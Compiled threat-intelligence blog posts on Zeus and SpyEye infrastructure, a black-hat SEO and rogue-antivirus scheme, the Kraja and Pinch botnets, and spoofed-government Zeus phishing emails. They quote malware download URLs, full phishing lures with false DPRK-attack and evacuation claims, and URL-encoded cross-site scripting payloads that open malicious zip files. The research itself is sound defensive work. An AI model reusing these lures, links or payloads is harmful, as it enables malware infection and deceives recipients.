Here are two command and control server domain names that have hosted both Zeus and SpyEye. The domain coolparts31.tw was a known Zeus (see MDL) command and control, but I found that it was also hosting SpyEye. More recently, I have been monitoring mir-krossover.com that was a known Zeus command and control (see MDL) but is also hosting SpyEye.

http://mir-krossover.com/mirspy/mainadmin/bin/bd.exe

b911f40ff9573f33e73055b2267a5cd7 bd.exe
VT: 36/ 43 (83.7%)

http://mir-krossover.com/mirspy/mainadmin/bin/id.exe

e8091d2099a8472b27a62c5ae57be5e9 id.exe
VT: 37/ 43 (86.0%)

Malware diversification allows the botnet operators to run multiple botnets, increasing their resilience to countermeasures aimed at taking down one particular strain. In addition, they can capitalize on new features and functionality available across various toolkits. To counter such operations we need to look beyond the toolkit and and investigate the operators as well.

Clustering Zeus Command and Control Servers



Recently, more than 150 individuals around the world have been arrested on bank fraud related charges after using the Zeus malware to acquire credentials that enabled the criminals to steal more than $70 million dollars. Those arrested include five Ukrainian individuals that are believed to be the masterminds behind the operation. Brian Krebs notes that there is a correlation between the decreasing number of active Zeus command and control servers and the timing of the arrests.

This is interesting because while “the media” often portrays Zeus as “a botnet” the security community rightly points out that Zeus is a malware toolkit not “a” botnet and that there are multiple Zeus botnets. However, what explains the decrease in Zeus command and control servers with the disruption of just one Zeus operation? While it is certainly true that any aspiring criminal can acquire Zeus and begin his or her own operation, is there a Zeus “core” that is organized and connected through links the criminal underground? Having just returned from Palantir’s Govcon feeling inspired I imported Zeus data from the MalwareDomainList and the ZeusTracker to explore the links between Zeus command and control servers.

While there are definitely more indicators, I focused on three: IP addresses, domain names, and email addresses used to register domain names. The IP addresses represent the servers that are used to host command and control servers. One such server may host multiple command and control servers allowing one to cluster malicious domain names that are hosted on the same server. Domain names are useful indicators but essential have a one-to-one relationship so it is more valuable to cluster them by the email address used to register the domain name. Using these indicators the Zeus command and control domain names can be clustered based on co-hosting (on the same IP address) and mutual registration (same email address). This may provide some indication if there is a “core” or Zeus activity.

However, there are significant limitations to bear in mind. Malicious hosting services are available in the criminal underground, so while a single server may be a hotspot of malware activity, it may not be directly related. On the other hand, some command and control servers may be using fast flux which would negate clustering by IP address altogether. Some command and control servers are based on IP addresses only and do not have domain names associated with them. On the other hand, a single domain name may be used for a variety of purposes. (For example, I have found a domain name that hosts both a Zeus and a SpyEye command and control server, despite the reported rivalry between them). In addition, the botnet operators may register a variety of domain names from a variety of email addresses. In such cases, clustering by email addresses would not yield significant links. Finally, there may be suppliers of domain names in them malware underground that register domain names with email addresses under their control, but sell the domains names to other criminals. In such cases, while the email address may be the same, the operators of botnets may not be directly related.

The data set used contains 5,907 domain names (control servers) and 4,505 IP addresses (servers) drawn from ZeusTracker and MalwareDomainList (where the activity on MDL contains “zeus”). Here, 4,505 IP addresses have been geocoded (not all were successfully geocoded) and displayed using Palantir’s heatmap. While there is Zeus activity hosted all over the world, there are noticeable concentrations in Europe, the Unites States and China.

This cluster on the Palantir graph represents the relationship between 5,907 domain names (control servers) and 4,505 IP addresses (servers). This initial display highlights a few interesting indicators. There are several clusters that are visually apparent which show multiple domain names hosted on one server (there are three prominent “star” clusters and several smaller ones) and there is a discernible “tree” structure in the center indicating relationships between single domain names that have been hosted on multiple IP addresses. And we can see thaht there are some familiar IP addresses used to register multiple domain names, the most notable being “hilarykneber@yahoo.com” which is the email addresses behind the Kneber botnet.

Zooming in to some of the clusters reveals some interesting behaviors. In this example, one server is hosting 60 domain names. These 60 domain names were registered with 17 different email addresses. And when some additional information from MDL is brought in, we see that most of the domains are hosting a Zeus executable with the same name “patch.exe” and that there is a naming convention. For example, “1-adm.com/patch.exe” was registered with “obeys@infotorrent.ru” while “1-adm.net/patch.exe” was registered with “yam@ml3.ru”. These domain names were all added to MDL around the same time and despite the multiple email addresses it does appear as if this is a single campaign.

In order to explore the question of whether or not there is a Zeus “core” of some sort, I filtered the domain names and IP addresses to those registered with the top five appearing email addresses (with the exception of contact@privacyprotect.org which is the email address given for those who have used this domain privacy service). Domain names registered with these five email addresses account for 6.09% (360/5907) of the Zeus command and control servers. However, this number increases to 17.9% (360/2004) when the number of control servers is restricted to those that contain email data. In addition to several “star” clusters as well a “tree” in the middle of the graph, we see that these email addresses have been actively propagating Zeus for approximately one year. (The time is derived from when the domain is added to either the MDL or ZeusTracker lists, which is used a rough indicator of when a domain became active).

When the selection is restricted to only those domain names registered by “hilarykneber@yahoo.com” we can see that these domains are represented across most of the clusters indicating that many of these domain are co-hosted on the same IP addresses with those registered by our other top email addresses. In addition, the “kneber” domain names are active through this year long period of data.

While a wide variety of criminals may set up disparate Zeus operations, clustering the Zeus command and control infrastructure in this way indicates that there is some evidence to support claims of a “core” set of Zeus operations. This may be one explanation for the observed decrease in active Zeus command and control servers.

However, this data only reflects only the relationships between IP addresses, domain names and the email addresses used to register the domain names. There are a variety of additional factors, especially those related to analysis of Zeus malware binaries that may support these linkages, provide additional linkages or challenge these linkages. Historical data showing coordinated movements to new IP addresses and name servers would provide additional means to cluster command and control servers with a higher degree of accuracy.

In Part 2 of this post I will broaden the analysis in order to see if the tentative conclusion hold with the introduction of additional data.

Black Hat SEO, PPC & RogueAV Part 2



Part 1 of “Black Hat SEO, PPC & RogueAV” focused on the type and amount of incoming traffic generated through BlackHat SEO methods. This traffic is monetized through the use of RogueAV, Pay-Per-Click and Pay-Per-Install affiliates. This post continues the analysis of this campaign by providing a inside look at this BHSEO operation.

The attackers acquired lists of thousands of FTP server credentials. The attackers may have purchased the compromised accounts from others in the cybercrime underground or harvested them from other operations. The attackers use several scripts to login to the FTP servers and upload their SEO scripts. The initial script uploaded to the compromised servers performs the following functions:

  • downloads the latest version of a redirection script
  • downloads a list of search queries
  • creates the files “tpl.txt”, “folders.txt” and “.htaccess”
  • creates a directory “wp-blog” that contains the files “go.php” (the downloaded redirection script), “keys.txt”, “nishe.txt”, “pages.txt” and “.htaccess”

The list of search queries are paired with random file paths in order to create pages on demand based on the search queries. When a request comes in, the redirection script check to see if the “referer” is from a search engine and if the the request appears to have been made by a “bot”. The latter function is performed by parsing the “user agent” header to check, for example, for indicators of a search engine crawler. If the “referer” is a search engine and the request is not made by a “bot”, the request is redirected to the SEO server. If either of these checks fail, the script will lookup the requested path to retrieve the search query it has been paired with.

http://127.0.0.1/eQikAjL8uovt/||chakra labels printable
http://127.0.0.1/eQpu8kNxWSo/||t mobile rebate printable
http://127.0.0.1/eQWiaZsv/||printable instructions for sand castles
http://127.0.0.1/eQouHA8/||printable hanukkah song lyrics
http://127.0.0.1/eQzVWiZjIpoh/||4tth of july printable crown

Then the script will take the search query and retrieve the results for the query from Google and display the content using the “tpl.txt” file, which is a template based on the look and feel of the compromised website. The links in the page point to the additional search query / file path pairings.

These pages are indexed by search engines and the search queries become associated with the malicious pages. In addition, when a user queries a search engine, and lands on the malicious page, the user’s request is redirected to the SEO server along with the query that the user searched for. These queries are collected and feed into the search query lists used by the attackers.

At last count the attackers had uploaded their SEO scripts to 11,978 servers, and although the server appears to have been abandoned on 2010-09-20 the figures from earlier in the campaign indicate that the attackers were able to attract significant amounts of traffic.

The attackers recorded the referring domain name as well as the search query used to arrive at the compromised domain. These records along with the number of hist were recorded by the attackers and available from an unprotected web interface.

In order to monetize their operation, the attackers used several affiliates. Users that the attackers detected were running non-Windows operating systems were redirected to pay-per-click affiliates at these domain names: www.rivasearchpage.com and www.offersfair.com. Windows users were redirected to RogueAV landing pages.

The Rogue AV affiliates supply “landing page” URLs to their fake scanning pages that attempt to trick the user into installing the fake security software. These URL’s change over time, and the attackers maintain scripts that update these URLs so that user are redirected to fresh URLs that are less likely to have been identified and blocked by the security community.

RogueAV_1:

url: http://ed2aa7.robertodefeaternow.com/ren/?2737=caeo&ca0f394=bc7oe7eea8&945aa=bc86zzo8za
file: db2d504abeedce8b404a1f5514989689 powersecure_2049_emr7.exe
VT: 3 /43 (7.0%)

RogueAV_2:

url 1: http://www3.sobaka-kaka.com/?[…]
url 2: http://www1.highguardsoftat.net/?[…]
file: 90245bf674ff3b16653fc6f7d191dead packupdate107_289.exe
VT: 18 /43 (41.9%)

Pay-Per-Install (PPI)

file: 02e62d95997b7db323175910bf14e19c file.1.exe
VT: 10/ 43 (23.3%)

This affiliate provides a URL that produces dynamic malware binaries. The attackers attempt to trick users into installing the malware by pretending that it is Adobe’s Flash player. The attackers script periodically queries the affiliate’s distribution point to receive a new binary, each new binary has a different hash value.

In addition, the attackers used malware detection services to scan the binaries to see how AV products detected them. The attackers used scan4you.biz, which Brian Krebs documented earlier this year, as well as ghostbusters.cc.

When executed this trojan attempt to connect to intromem.com and imagehut4.cn along with several other domains (murambus.net, aboutkayndu.net, officialgigaify.net, kataburglary.net, ftuny.com, 2youg.com) followed by numerous connections to ad servers.

In summary, this is not a complicated operation and is largely automated. The system collects what users search for and then creates fake pages based on those queries. search engines are fed these bogus pages and users are redirected to the SEO server that collects statistical information and the forward the user on to a monetization strategy either RogueAV, PPI or PPC. All the attackers need is a fresh supply of compromised FTP credentials which can be purchased in the cybercrime underground.

Krajabot



The Kraja botnet has managed to compromise 185,645 computers, the vast majority of which are located in Russia. Of the 199,513 unique IP addresses recorded from compromised computers, 87.88% are in IP address ranges assigned to Russia. The name “Kraja botnet” comes from an image located on the command and control server which was originally discovered by malwaredomainlist.com. The Kraja botnet is related to the “Shiz” malware that was recently documented by Arbor Networks. Arbor concluded that this malware is also related to the “rohimafo” family. One of the more interesting observations made by Arbor is that the “shiz” malware will attempt to null-route specific IP address ranges that include a variety of security companies such as F-SECURE, KASPERSKY, SOPHOS, SYMANTEC, MCAFEE and TREND MICRO as well as various sandbox and analysis tools.

My analysis of the command and control infrastructure reveals that between Sept 11, 2010 to Sept 27, 2010 there were 185,645 compromised computers (using 199,513 unique IP addresses) that requested one of the following PHP files on the command and control servers: knock.php, knok.php and socks.php. In addition to recording the IP addresses of the compromised machines, I was able to record what appears to be a unique ID number for each compromised computer. The vast majority of the compromised computers requested knock.php.

knock.php – sends a configuration file to the compromised machine with what appear to be alternative command and control locations as well as the “magic” URL which appears to be a monetization strategy based on pay-per-click.

knok.php – sends the name of the operating system to the control server (may determine which computers to install a socks proxy on).

socks.php – sends the SOCKS proxy port number to control server.

While there was geographic distribution, a total of 87.88 percent of the IP addresses of the compromised hosts are in ranges assigned to Russia. This is significant because Russian and CIS are often not targeted by botnets because most of the PPC/PPI affiliates do not pay for clicks and installs from Russian IP addresses. It is also significant because Russian law enforcement generally requires there to be Russian victims in order to proceed with investigations. In this case, Russian appear to be the target of this botnet.

Old Threats are Current Threats



Despite the fact that the authors of the Pinch Trojan were “pinched” by law enforcement in 2007, the Pinch Trojan continues to be a current threat both because the source code is available (so anyone can modify it and release a variant) but also because old versions of Pinch continue to be effectively used. In 2007, F-Secure analyzed data collected from a Pinch command and control server using a tool called PinchParserPro 2.3.1.7. PinchParserPro allows the attackers to parse, search and export the data stolen by the Pinch Trojan. Three years later Pinch is still in action, often bundled with an assortment of other malware. (Here is a paper that has a detailed technical analysis of Pinch variants.)

Data recovered from a recently active Pinch command and control server, moretds.org (formerly moretds.in) indicates that 26,308 IP addresses uploaded data to the server. The top three countries affected were the US, Germany and Turkey but there was a considerable geographic distribution with a total of 150 countries affected.

In order to read the data PinchParserPro 2.2.2.2 had to be used, which is an older than version than what F-Secure used (PinchParserPro 2.3.1.7) in 2007. It is interesting that such an old version is still being successfully deployed.

While investigating the recovered data, credentials associated with government accounts were discovered. One of the victims of the malware was the Ministry of Foreign Affairs of the People’s Republic of China. While there has been much attention on malware attacks emanating from China, China is also a victim of malware attacks. In fact, a recent cyber-crime report by Symantec revealed that Chinese users were the most victimized by online crime.

The governmental accounts recovered from the control server include:

  • Ministry of Foreign Affairs, China
  • Industrial and Commercial Administration Bureau in Taiyuan, China
  • Ministry of Health, Turkey
  • Izmir Tax Services Department, Turkey
  • Istanbul Security Directorate, Turkey
  • Aegean Obstetrics and Gynecology Training and Research Hospital, Turkey
  • Ministry of Environment, Brazil
  • Regional Labor Court 6th Region, Brazil
  • National Electoral Commision, Poland
  • Ministry of Agriculture, Forestry and Water Management, Macedonia
  • Drug Enforcement Administration, Office of Diversion Control, E-Commerce program, USA
  • City of Oklahoma City, USA
  • Taipei Sewage Systems Office of Health, Taiwan
  • Ministry of Interior, Ukraine
  • Dirección Nacional de los Registros Nacionales, Argentina

While there is often an emphasis on the latest malware threats, old malware persists and continues to be very effective. In addition, attackers are able to compromise government systems using these outdated tools. And, even if the attackers did not intend to compromise these system — and I don’t think they did — attackers are, in general, beginning to realize that not all compromises are the same and that there may be additional value that can be extracted from particular compromised machines.

Crime or Espionage? Part 2



In “Crime or Espionage Part 1” I examined a series of attacks that appear to be aimed at those interested in intelligence issues and those in the government and military. The malware used in these attacks was ZeuS and there are common command and control elements used in the attacks beginning in December 2009 and continuing until late August 2010. In addition, these attacks have been linked to infrastructure used by the Kneber botnet, a ZeuS-based botnet discovered by Netwitness.

This post is an overview of a collection of publicly available emails associated with these ongoing series of attacks. These are the socially engineered emails designed to lure potential victims into clicking on and executing the attackers’ malicious code. While the attacks are not targeted down to the individual, or even institutional level, and appear to have been sent to a wide variety of targets, the content of the emails is geared towards those interested in intelligence, military and security issues.

The malicious emails appear to have been sent from email addresses associated with the following domain names: nsa.gov, greylogic.us, pentagon.af.mil, fbi.gov, dia.mil, dhs.gov, stratcom.mil and ifc.nato.int. With the exception of Jeff Carr’s Grey Logic, the emails appear to come from government and military sources. The subject lines and the text of the emails largely focus on security issues with some messages making use of classification markings such as “U//FOUO” and official looking email footers in order to appear to be legitimate.

The links in to the malicious files contained within the emails make use of a variety of hosts. The attackers will often include a link to the file sharing services rapidshare.com, sendspace.com and depositfiles.com. The attackers also use compromised legitimate websites, many of which are running the Joomla! CMS. However, at other times the attackers have used domain names registered specifically for malicious purposes:

dnicenter.com – abuseemaildhcp@gmail.com
dhsorg.org – hilarykneber@yahoo.com

The email addresses abuseemaildhcp@gmail.com and hilarykneber@yahoo.com are well known and have been used to register numerous domain names associated with malware, mostly ZeuS.

The “hilarykneber@yahoo.com” email address was made famous by discovery of the Kneber botnet by Netwitness. Netwitness revealed that many of the compromised computers in the US included government networks as well as Fortune 500 enterprises. This is not entirely surprising as any large botnet is likely to have compromised some government computers. But, the recognition of this fact may be the catalyst for the series of attacks using intelligence, military and security themes as lure. Not all compromised computers are of the same value, surely the attackers realize this. In “Conversations With a Blackhat” RSnake outlines this scenario:

There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.

So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.

A variation of this is a scenario in which the botmaster grows the botnet but through means that increase the chances of compromising a target of interest that “badguy1″ wants to compromise. By using intelligence, military and security issues and themes in the lure emails, perhaps the attackers are aiming to increase the likelihood of compromising a sensitive location. In such a scenario, the botmaster is happy to get some new bots connecting in with the Zeus command and control server (from which credentials and other information can be extracted) and can also sell any sensitive data that’s been stolen or sell access to any sensitive compromised computer.

The emails below are a collection of publicly available emails associated with a series of ongoing of attacks using Zeus.

December 9, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://contagiodump.blogspot.com/2009/12/creative-nsa-spoof-attack-of-day.html

From: ecu@nsa.gov
Date: December 9, 2009 4:33:51 PM GMT+05:00
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS

AFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009

CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)

INFORMATION SUBJECT TO EXPORT CONTROL LAWS

WARNING – This document contains technical data whose export is restricted by the Arms Export Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended (Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal penalties. Disseminate IAW DoDD 5230.25.

DESTRUCTION NOTICE – For classified documents, follow the procedures in DOD 5220.22-M, National Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program, Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of contents or reconstruction of the document.

Export of the attached information (which includes, in some circumstances, release to foreign nationals within the United States) without first obtaining approval or license from the Department of State for items controlled by the International Traffic in ArmsRegulation (ITAR), or the Department of Commerce for items controlled by the Export Administration Regulation (EAR), may constitute a violation of law.

Download:

http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip

or

http://rapidshare.com/files/318309046/CYBERCAFE.zip.html

http://www.sendspace.com/file/fmbt01

December 14, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://groups.yahoo.co.jp/group/boxing-fun/message/20326?threaded=1&viscount=14&expand=1

From: uctd@nsa.gov
Date: December 14, 2009 1:56:24 PM GMT+05:00
Subject: Information Systems Security Reminder

Information Systems Security Reminder

— Users are reminded to be aware and vigilant when using government information services both inside and outside protected environments.

— Be aware of your surroundings when accessing these services remotely, and prefer trusted workstations. Evaluate the security risks inherent with use of public workstations, including “shoulder surfing” by nearby persons.

— When communicating via email, know with whom you are communicating. Common adversary techniques include social engineering, email phishing, and evocative attachments. Government system capabilities may only be discussed with authorized personnel.

— If you make an error (e.g., data spill), report it so that the problem can be addressed. Report any anomalies you observe to your security office or service desk.

Security Software:

http://hkcaregroup.com/modlogan/MILSOFT.zip

or

http://rapidshare.com/files/320369638/MILSOFT.zip.html

http://fcpra.org/downloads/MILSOFT.zip

February 10, 2010
Source: http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/

From: jeffreyc@greylogic.us
Date: Wednesday, February 10, 2010 7:34 AM
Subject: Russian spear phishing attack against .mil and .gov employees

Russian spear phishing attack against .mil and .gov employees

A “relatively large” number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the “2020 Project”. It’s purpose is to collect passwords and obtain remote access to the infected hosts.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your
computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://fcpra.org/downloads/winupdate.zip

or

http://www.sendspace.com/file/tj373l

___________
Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal
Investigator of Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffreyc@greylogic.us

February 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg12517.html

From: jeffreyc@nsa.gov
Date: February 11, 2010 9:39:15 AM GMT+05:00
Subject: RE: Zeus Attack Spoofs NSA, Targets .gov and .mil

Zeus Attack Spoofs NSA, Targets .gov and .mil

Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.

According one state government security expert who received multiple copies of the message, the e-mail campaign — apparently designed to steal passwords from infected systems — was sent exclusively to government (.gov) and military (.mil) e-mail addresses.

The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft® Windows® and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://mv.net.md/update/update.zip

or

http://www.sendspace.com/file/7jmxtq

February 12, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/dod-roles-and-missions-in-homeland-security

From: apacs@pentagon.af.mil
Date: 12 Feb 2010 20:41:01 (GMT)
Subject: DoD Roles and Missions in Homeland Security

Defense Science Board

DoD Roles and Missions in Homeland Security

VOLUME II – A: SUPPORTING REPORTS

This report is a product of the Defense Science Board (DSB). The DSB is a Federal Advisory Committee established to provide independent advice to the Secretary of Defense. Statements, opinions, conclusions and recommendations in this report do not necessarily represent the official position of the Department of Defense.

Download:

http://mv.net.md/dsb/DSB.zip

or

http://www.sendspace.com/file/rdxgzd

___________
Office of the Under Secretary of Defense
For Acquisition, Technology, and Logistics
Washington, D.C. 20301-3140

February 21, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg25834.html

From: cttd@fbi.gov
Date: February 21, 2010 7:37:16 AM GMT+05:00
Subject: INTELLIGENCE BULLETIN

FEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETIN

February 2010

Weapons of Mass Destruction Directorate

Indicators for Terrorist Use of Toxic Industrial Chemicals

THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.

UNCLASSIFIED//FOR OFFICIAL USE ONLY

Download:

http://timingsolution.com/Doc/BULLETIN.zip

or

http://www.sendspace.com/file/goz3yd

___________
HANDLING NOTICE: Recipients are reminded that FBI Intelligence Bulletins contain sensitive terrorism and counterterrorism information meant for use primarily within the law enforcement and homeland security communities. Such bulletins shall not be released, either in written or oral form, to the media, the general public, or other personnel who do not have a valid need-to-know without prior approval from an authorized FBI official, as such release could jeopardize national security.

March 6, 2010
Source: http://aquiacreek.com/showthread.php?1712-URGENT!-Phising-Email-Scam

Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 7.12 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3c%61%20%68%72%65%66%3d%22%6 8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% 63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a %69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% 70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 %6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% 74%3e

________________
Office of the Director of National Intelligence Washington, D.C. 20511

* The actual URL is: http://dnicenter.com/docs/report.zip

March 7, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/for-official-use-only—dprk-missile-attack-on-japan
Source: http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email

From: SSC@dia.mil
Date: 7 Mar 2010 14:17:51 (GMT)
Subject: FOR OFFICIAL USE ONLY

Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://www.mod.gov.ge/2007/video/movie.php?l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22

________________
Office of the Director of National Intelligence
Washington, D.C. 20511

* The actual URL is: http://officialweightlosshelp.org/wp-admin/report.zip

March 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://dl.ambiweb.de/mirrors/www.tldp.org/LDP/LGNET/173/lg_launderette.html

From: hsi@dhs.gov
Date: March 11, 2010 11:38:56 PM GMT+05:00
Subject: U.S. Department of Homeland Security

Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

11 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://dhsorg.org/docs/instructions.zip

________________
U.S. Department of Homeland Security
Washington, DC 20528

March 13, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/re-instructions-unclassified

From: NSI@dhs.gov
Date: 13 Mar 2010 18:26:54 (GMT)
Subject: RE: Instructions UNCLASSIFIED

U.S. Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

13 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
______________________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
______________________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://www.sendspace.com/file/h96uh1

or

http://depositfiles.com/files/xj1wvamc4

________________________________________
U.S. Department of Homeland Security
Washington, DC 20528

June 16, 2010
Source: http://www.clearancejobs.com/security_tips.php

From: rss@stratcom.mil
Date: Wed Jun 16 13:10:08 2010
Subject: From STRATCOM to

,

United States Strategic Command

Commanders Reading List

